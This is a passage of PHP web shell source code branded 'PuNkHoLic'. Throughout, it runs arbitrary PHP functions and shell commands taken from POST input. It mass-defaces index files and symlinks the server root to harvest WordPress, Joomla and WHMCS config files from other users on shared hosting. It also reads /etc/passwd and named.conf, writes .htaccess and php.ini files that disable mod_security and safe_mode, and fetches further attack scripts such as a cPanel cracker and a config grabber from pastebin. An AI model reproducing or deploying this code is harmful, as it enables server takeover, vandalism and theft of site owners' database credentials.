if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
if(function_exists($_POST['p1']))
echo $_POST['p1']($_POST['p2']);
$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
echo '<h1>String conversions</h1><div class=content>';
$stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
foreach($stringTools as $k => $v)
echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"</pre></div>";
printFooter();
}
function actionFilesTools() {
if( isset($_POST['p1']) )
$_POST['p1'] = urldecode($_POST['p1']);
if(@$_POST['p2']=='download') {
if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST['p1']);
header("Content-Type: ".$type);
}
$fp = @fopen($_POST['p1'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
} elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
}
exit;
}
if( @$_POST['p2'] == 'mkfile' ) {
if(!file_exists($_POST['p1'])) {
$fp = @fopen($_POST['p1'], 'w');
if($fp) {
$_POST['p2'] = "edit";
fclose($fp);
}
}
}
printHeader();
echo '<h1>File tools</h1><div class=content>';
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
echo '<br><br>';
switch($_POST['p2']) {
case 'view':
echo '<pre class=ml1>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '<div class=ml1 style="background-color: black;color:black;">';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
else
die('<script>g(null,null,null,null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!<br><script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0:$h[2] .= ' '; break;
case 9:$h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "\n";
}
}
echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#red><pre>'.$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
else
die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
break;
case 'touch':
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('<script>g(null,null,null,null,"")</script>');
else {
echo 'Fail!<script>document.mf.p3.value="";</script>';
}
} else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
}
echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
break;
case 'mkfile':
break;
}
echo '</div>';
printFooter();
}
function actionDefacer() {
printHeader();
echo "<h1>Recursive Mass Defacer</h1><div class=content>";
?>
<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
<p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
<br>file name : <input type=text name=file size=20 value="index.htm">
<br>Text Content : <input type=text name=Contents size=20 value="Hacked by PuNkHoLic ">
<br><input type=submit value="Update"></p></form>
<?php
if ($_POST['a'] == 'Defacer') {
$mainpath = $_POST[p1];
$file = $_POST[p2];
$txtContents = $_POST[p3];
echo "-----------------------------------------------<br>
[+] Recursive Mass defacer<br>
-----------------------------------------------<br><br> ";
$dir = opendir($mainpath);
while ($row = readdir($dir)) {
$start = @fopen("$row/$file", "w+");
$code = $txtContents;
$finish = @fwrite($start, $code);
if ($finish) {
echo "http://$row/$file<br>";
}
if (strncasecmp(PHP_OS, 'WIN', 3) == 0) {
exec("for /r %cd% %i in (.) do @copy $file %i 1>NUL");
} else {
system("find $PWM -type d -exec cp $file {} \;");
}
}
echo "-----------------------------------------------<br><br>[+] Script by PuNkHoLic [+]";
}
echo '</div>';
printFooter();
}
function actionConsole() {
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';\n";
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='".$GLOBALS['cwd']."';";
}
}
echo "document.cf.output.value+='".$temp."';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
echo '<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push("");
cur = cmds.length-1;
}
</script>';
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
foreach($GLOBALS['aliases'] as $n => $v) {
if($v == '') {
echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
continue;
}
echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
}
echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
echo '</form></div><script>document.cf.cmd.focus();</script>';
printFooter();
}
function actionLogout() {
unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
echo '<title>Get out Now</title><body bgcolor=#000000><center><img src="http://i.imgur.com/t54UCIw.jpgl"><br>
<style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
<span style="color:red;font: 20pt audiowide;">You are out now :D<br>www.facebook.com/PuNkHoLic</h2></span></center></body>';
}
///my editing start here for tools
function download_remote_file($file_url, $save_to)
{
$content = file_get_contents($file_url);
file_put_contents($save_to, $content);
}
if (isset($_POST['cp'])) {
download_remote_file('http://pastebin.com/raw/2Ntdj7ju', realpath("./") . '/cp.php');
header("location:cp.php");
}
if (isset($_POST['SymlinkbySmevk'])) {
download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php');
header("location:SymlinkbySmevk.php");
}
if (isset($_POST['SymlinkbyCheetah'])) {
download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php');
header("location:SymlinkbyCheetah.php");
}
if (isset($_POST['SymlinkbyTorjan'])) {
download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py');
$url = 'http://' . $_SERVER['SERVER_NAME'] . dirname($_SERVER['SCRIPT_NAME']) . '/trjnx/';
header('location: '.$url);
system('python sym.py');
}
if (isset($_POST['jump'])) {
download_remote_file('http://pastebin.com/raw/MxtcT6nX', realpath("./") . '/jump.php');
header("location:jump.php");
}
if (isset($_POST['adminer'])) {
system('wget https://www.adminer.org/static/download/4.2.5/adminer-4.2.5-mysql-en.php adminer.php');
header("location:adminer-4.2.5-mysql-en.php");
}
if (isset($_POST['cg'])) {
download_remote_file('http://pastebin.com/raw/WSgkDHSN', realpath("./") . '/cg.php');
header("location:cg.php");
}
function actionImportScripts() {
printHeader();
echo '<table border="1px" align="center" id ="PuNkHoLictools" cellpadding="10" border-color"green"><tr><td>Just click and get the Script :).</td><tr><td>
<form action ="" method="post">
<input type = "submit" name="cp" value ="Cpanel Cracker"></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyTorjan"value ="Symlink Python Script By Torjan"></a></td></tr>';
echo '<td><form action ="" method="post"><input type = "submit" name="SymlinkbySmevk" value ="Symlink Script By SmEvK_PaThAn"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyCheetah" value ="Symlink By Kashmiri Cheetah"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="jump" value ="Jumping Shell"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="adminer"value ="Adminer"></a></td></tr>';
echo '<tr><td><form action ="" method="post"><input type = "submit" name="cg"value ="Config Grabber"></a></td></tr>';
printFooter();
}
function actionShared() {
printHeader();
$file = @implode(@file("/etc/named.conf"));
if (!$file) {
die("# can't ReaD -> [ /etc/named.conf ]");
}
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
{
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
$array= "http://$domain " . $user['name'] . "<br>";
$lol= '' . get_current_user();
if (strpos($array, "$lol") !== false) {
$shared = str_replace(array(" $lol"), "", $array);
echo "<center>$shared";
}
}
}
printFooter();
}
function actionSymlink() {
printHeader();
echo '<h1>Symlink</h1>';
$furl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$expld = explode('/',$furl );
$burl =str_replace(end($expld),'',$furl);
echo '<div class="content"><center>
<h3>[ <a href="#" onclick="g(\'symlink\',null,\'website\',null)">Domains</a> ] -
[ <a href="#" onclick="g(\'symlink\',null,\'whole\',null)">Whole Server Symlink<sup style="color:red;text-decoration:blink;"></sup></a> ] -
[ <a href="#" onclick="g(\'symlink\',null,\'config\',null)">Config files symlink</a> ]</h3></center>';
if(isset($_POST['p1']) && $_POST['p1']=='website')
{
echo "<center>";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){
echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
} else {
echo "<table align=center class='main' border=0 ><tr><th> Domains </th></tr>";
$unk = array();
foreach($d0mains as $d0main){
if(@eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$unk[] = $domains[1][0];
flush();
}
}
}
$count=1;
$unk = array_unique($unk);
$l=0;
foreach($unk as $d){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$d));
echo "<tr".($l?' class=l1':'')."><td><a href=http://".$d."/>".$d."</a></td><td>".$user['name']."</td></tr>";
flush();
$count++;
$l=$l?0:1;
}
echo "</table>";
}
echo "</center>";
}
if(isset($_POST['p1']) && $_POST['p1']=='whole')
{
echo "<center>";
@mkdir('PCAPuNkHoLic_sym',0777);
$hdt= "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
$hfp =@fopen ('PCAPuNkHoLic_sym/.htaccess','w');
fwrite($hfp ,$hdt);
if(function_exists('symlink')) {
@symlink('/','PCAPuNkHoLic_sym/root');
}
$d0mains = @file('/etc/named.conf');
if(!$d0mains) {
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
$dt = file('/etc/passwd');
$l=0;
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
echo "<tr".($l?' class=l1':'')."><td>".$j."</td><td>---</td><td>".$r[0]."</td><td><a href='PCAPuNkHoLic_sym/root".$r[5]."/public_html' target='_blank'>symlink</a></td></tr>";
$l=$l?0:1;
$j++;
}
}
echo '</table>';
} else {
echo "<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
$count=1;
$mck = array();
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0])) >2){
$mck[] = $domain[1][0];
}
}
}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
$infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
$usr[] = $infos['name'];
$dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
$r = explode(':',$d);
if(strpos($r[5],'home')) {
$passwd[$r[0]] = $r[5];
}
}
$l=0;
$j=1;
foreach($usr as $r) {
echo "<tr".($l?' class=l1':'')."><td>".$count++."</td>
<td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td>
<td>'.$r."</td>
<td><a href='PCAPuNkHoLic_sym/root".$passwd[$r]."/public_html' target='_blank'>symlink</a></td></tr>";
flush();
$l=$l?0:1;
$j++;
}
echo '</table>';
}
echo "</center>";
}
if(isset($_POST['p1']) && $_POST['p1']=='config')
{
echo "<center>";
@mkdir('PCAPuNkHoLic_sym',0777);
$hdt = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \nAddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$hfp = @fopen ('PCAPuNkHoLic_sym/.htaccess','w');
@fwrite($hfp ,$hdt);
if(function_exists('symlink')) {
@symlink('/','PCAPuNkHoLic_sym/root');
}
$d0mains=@file('/etc/named.conf');
if(!$d0mains) {
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
}else {
echo "<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domain </th<th> User </th>><th> Script </th></tr>";
$count = 1;
$l=0;
foreach($d0mains as $d0main){
if(@eregi('zone',$d0main)){
preg_match_all('#zone "(.*)"#',$d0main,$domain);
flush();
if(strlen(trim($domain[1][0]))>2){
$user = posix_getpwuid(@fileowner('/etc/valiases/'.$domain[1][0]));
$c1 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/wp-config.php';
$ch01 = get_headers($c1);
$cf01 = $ch01[0];
$c2 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/blog/wp-config.php';
$ch02 = get_headers($c2);
$cf02 = $ch02[0];
$c3 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/configuration.php';
$ch03 = get_headers($c3);
$cf03 = $ch03[0];
$c4 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/joomla/configuration.php';
$ch04 = get_headers($c4);
$cf04 = $ch04[0];
$c5 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/includes/config.php';
$ch05 = get_headers($c5);
$cf05 = $ch05[0];
$c6 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/vb/includes/config.php';
$ch06 = get_headers($c6);
$cf06 = $ch06[0];
$c7 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/forum/includes/config.php';
$ch07 = get_headers($c7);
$cf07 = $ch07[0];
$c8 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'public_html/clients/configuration.php';
$ch08 = get_headers($c8);
$cf08 = $ch08[0];
$c9 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/support/configuration.php';
$ch09 = get_headers($c9);
$cf09 = $ch09[0];
$c10 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
$ch10 = get_headers($c10);
$cf10 = $ch10[0];
$c11 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/submitticket.php';
$ch11 = get_headers($c11);
$cf11 = $ch11[0];
$c12 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/client/configuration.php';
$ch12 = get_headers($c12);
$cf12 = $ch12[0];
$c13 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/includes/configure.php';
$ch13 = get_headers($c13);
$cf13 = $ch13[0];
$c14 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/include/app_config.php';
$ch14 = get_headers($c14);
$cf14 = $ch14[0];
$c15 = $burl.'/PCAPuNkHoLic_sym/root/home/'.$user['name'].'/public_html/sites/default/settings.php';
$ch15 = get_headers($c15);
$cf15 = $ch15[0];
$out = ' ';
if(strpos($cf01,'200') == true){ $out = "<a href='".$c1."' target='_blank'>Wordpress</a>"; }
elseif(strpos($cf02,'200') == true){ $out = "<a href='".$c2."' target='_blank'>Wordpress</a>"; }
elseif(strpos($cf03,'200') == true && strpos($cf11,'200') == true) { $out = " <a href='".$c11."' target='_blank'>WHMCS</a>"; }
elseif(strpos($cf09,'200') == true){ $out = " <a href='".$c9."' target='_blank'>WHMCS</a>";}
elseif(strpos($cf10,'200') == true){ $out = " <a href='".$c10."' target='_blank'>WHMCS</a>"; }
elseif(strpos($cf03,'200') == true){ $out = " <a href='".$c3."' target='_blank'>Joomla</a>"; }
elseif(strpos($cf04,'200') == true){ $out = " <a href='".$c4."' target='_blank'>Joomla</a>"; }
elseif(strpos($cf05,'200') == true){ $out = " <a href='".$c5."' target='_blank'>vBulletin</a>";}
elseif(strpos($cf06,'200') == true){ $out = " <a href='".$c6."' target='_blank'>vBulletin</a>";}
elseif(strpos($cf07,'200') == true){ $out = " <a href='".$c7."' target='_blank'>vBulletin</a>";}
elseif(strpos($cf08,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Client Area</a>";}
elseif(strpos($cf12,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Client Area</a>";}
elseif(strpos($cf13,'200') == true){ $out = " <a href='".$c7."' target='_blank'>osCommerce/Zen Cart</a>";}
elseif(strpos($cf14,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Magento</a>";}
elseif(strpos($cf15,'200') == true){ $out = " <a href='".$c7."' target='_blank'>Drupal</a>";}
else {
continue;
}
echo '<tr'.($l?' class=l1':'').'><td>'.$count++.'</td><td><a href=http://www.'.$domain[1][0].'/>'.$domain[1][0].'</a></td><td>'.$user['name'].'</td><td>'.$out.'</td></tr>';
flush();
$l=$l?0:1;
}
}
}
echo "</table>";
}
echo "</center>";
}
echo "</div>";
printFooter();
}
function actionJumping()
{printHeader();
echo '<html><head><title>'.getenv("HTTP_HOST").' - Jumping Server</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<font size="4" color="#000000" face="Calibri"><b>Error: Safe_mode = On</b></font>');
set_time_limit(0);@$passwd = fopen('/etc/passwd','r');if (!$passwd) { die('<font size="4" color="#000000" face="Calibri"><b>[-] Error : Coudn`t Read /etc/passwd</b></font>'); }
$pub = array();$users = array();$conf = array();$i = 0;while(!feof($passwd)){$str = fgets($passwd);if ($i > 100){ $pos = strpos($str,':');$username = substr($str,0,$pos);$dirz = '/home/'.$username.'/public_html/';if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username);array_push($pub,$dirz); }}}$i++;}
echo '<font color=aqua> [-]==================[ START ]==================[-]<br></font>';
foreach ($users as $user){echo "<font color=#a3e956> [+] /home/$user/public_html/</font><br/>";} echo "\n <font color=aqua><br>[-]==================[ FINISH ]==================[-] <br></font>\n"; echo '</body></html>';
printFooter();
}
function actionSubdomain() {
printHeader();
error_reporting(0);
$user = get_current_user();
$open = opendir('/home/' . $user . '/access-logs/');
while ($dir = readdir($open)) {
$totalDoamin[] = $dir;
}
closedir($open);
$total = count($totalDoamin);
$domain = $total - 2;
if ($domain > 0) {
echo "<h2><b><font style=\"color: #a3e956 ;\" > ~ Total </font><font style=\"color: #a3e956; \">" . $domain . "</font><font style=\"color: #a3e956;\" > Sub Domain Found! ~ </font><br><BR>";
} else {
echo "<h2><b> ~ <font color='red' style=\"color: red; text-shadow: red 0px 0px 4px ; \">0</font><font style=\"color: #black; text-shadow: black 0px 0px 6px ;\"> Sub Domain Found! ~</font><br><BR>";
}
$scan = array_diff(scandir('/home/' . $user . '/access-logs/'), array('.'));
$domains = implode("
http://", $scan);
echo '
<style>
body {
text-align: center;
}
</style><textarea style="color: #a3e956; background-color: black" rows=\'30\' cols=\'100\'>';
print_r($domains);
echo '</textarea>';
printFooter();
}
function actionSym() {
printHeader();
$file = @implode(@file("/etc/named.conf"));
if (!$file) {
die("# can't ReaD -> [ /etc/named.conf ]");
}
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
{
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
$array= "<br>http://$domain<br>";
$lol= '' . get_current_user();
if (strpos($array, "$lol") == false) {
$shared = str_replace(array(" $lol"), "", $array);
echo "<center>$shared";
}
}
}
printFooter();
}
function actionBypass() {
printHeader();
echo '<h1>Safe Mode</h1>';
echo '<div class="content">';
echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
if(!empty($_POST['p2']) && isset($_POST['p2']))
{
$fil=fopen($GLOBALS['cwd'].".htaccess","w");
fwrite($fil,'<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>');
fclose($fil);
}
if(!empty($_POST['p1'])&& isset($_POST['p1']))
{
$fil=fopen($GLOBALS['cwd']."php.ini","w");
fwrite($fil,'safe_mode=OFF
disable_functions=NONE');
fclose($fil);
}
if(!empty($_POST['p3']) && isset($_POST['p3']))
{
$fil=fopen($GLOBALS['cwd'].".htaccess","w");
fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .sh
AddHandler cgi-script .pl
AddHandler cgi-script .pl');
fclose($fil);
}
echo "<br><br /><br /></div>";
echo '</div>';
printFooter();
}
function actionDeface() {
printHeader();
echo "<h1>Mass Defacer by PuNkHoLic</h1><div class=content>";
?>
<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
<p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
<br>file name : <input type=text name=file size=20 value="index.php">
<br>Text Content : <input type=text name=Contents size=70 value="Add your deface txt here">
<br><input type=submit value="Deface now"></p></form>
<?php
if ($_POST['a'] == 'Deface') {
$mainpath = $_POST[p1];
$file = $_POST[p2];
$txtContents = $_POST[p3];
echo "PuNkHoLic";
$dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
while ($row = readdir($dir)) {
$start = @fopen("$row/$file", "w+");
$code = $txtContents;
$finish = @fwrite($start, $code);
if ($finish) {
echo "$row/$file > Done<br><br>";
}
}
}
echo '</div>';
printFooter();
}
function actionDomain() {
printHeader();
echo '<h1>Local Domains</h1><div class=content>';
$file = @implode(@file("/etc/named.conf"));
$Domain_path = "/var/named";
if (!$file) {
$domains = scandir($Domain_path);
$count=1;
$dc = 0;
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>There are : ( <b>" . count($domains) . "</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr>
<tr><td>No</td><td>Domain</td><td>User</td></tr>";
foreach ($domains as &$domain) {
if (stripos($domain,".db")) {
$domain = str_replace('.db','',$domain);
}
if (strlen($domain) > 6) {
